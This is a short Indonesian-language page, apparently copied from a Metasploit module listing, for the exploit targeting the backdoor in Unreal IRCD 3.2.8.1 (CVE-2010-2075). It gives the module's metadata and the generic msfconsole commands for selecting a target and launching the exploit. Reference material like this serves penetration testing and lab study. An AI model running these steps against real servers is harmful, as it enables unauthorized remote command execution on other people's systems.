Modul ini mengeksploitasi backdoor berbahaya yang ditambahkan ke arsip unduhan Unreal IRCD 3.2.8.1. Backdoor ini hadir dalam arsip Unreal3.2.8.1.tar.gz antara November 2009 dan 12 Juni 2010.
Module Name
exploit/unix/irc/unreal_ircd_3281_backdoorAuthors
hdm <x [at] hdm.io>References
CVE-2010-2075OSVDB-65445
URL: http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt
Targets
Automatic TargetPlatforms
unixArchitectures
cmd
Reliability
ExcellentDevelopment
Source CodeHistory
Module Options
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > show targets
...targets...
msf exploit(unreal_ircd_3281_backdoor) > set TARGET <target-id>
msf exploit(unreal_ircd_3281_backdoor) > show options
...show and set options...
msf exploit(unreal_ircd_3281_backdoor) > exploit
Tested
Kali Linux 2018.4Metasploit v4.17.29-dev
0 komentar